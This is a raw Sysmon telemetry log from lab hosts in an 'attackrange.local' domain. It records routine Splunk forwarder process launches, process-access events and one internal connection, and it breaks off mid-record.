07:42:50.190{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.190{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F27A-60EB-DD7C-00000000CF01}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.190{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27A-60EB-DD7C-00000000CF01}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.141{466BC892-F27A-60EB-DD7C-00000000CF01}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.137{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=114CA18162E242302EF105ABA432E760,SHA256=17A47E3C5C3C2BE0B0CF408F73AAE41BCD67FBBE75117E67FCCE2099D8DD8770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:50.079{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60A14AE06FE510F71A7E76AB69B6B915,SHA256=22744DFCEF2080D9A4DB011BAC9D1EB0FEB3481927E43F5D025BDC941A56FB72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.768{466BC892-F27B-60EB-DF7C-00000000CF01}77168544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.553{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27B-60EB-DF7C-00000000CF01}7716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.537{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.537{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.537{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.537{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.537{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F27B-60EB-DF7C-00000000CF01}7716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.537{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27B-60EB-DF7C-00000000CF01}7716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.538{466BC892-F27B-60EB-DF7C-00000000CF01}7716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.153{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=977931B5A92BB01976C2CC8EFE93C2EE,SHA256=9A52C812D24742DADCB6D21BA6488BAB138D8AEB0E70E8DFC5D0F91EEB153F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.153{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C0651B0CB496569EC5EA27EA4A2E579C,SHA256=8280063A02D54619C51F0B1EA4B4FF356E88D6AD8BD2C6A9DBD4705A0CD1025F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:50.259{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57137-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:51.095{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EF7BD62D7ACBE256EC5C08433133368,SHA256=45287B1C91E2DD0C62312F2D34E0719DCFD36B6A313117551258A45DE50AB196,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27C-60EB-E17C-00000000CF01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F27C-60EB-E17C-00000000CF01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27C-60EB-E17C-00000000CF01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.906{466BC892-F27C-60EB-E17C-00000000CF01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.552{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDF0035593C4116EF545E5A66FEA5ECB,SHA256=20B5B49367EAFBF998F94FD23A77125A6CFDE150C2DC4FB9328F54821676D972,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.221{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27C-60EB-E07C-00000000CF01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.221{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.221{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 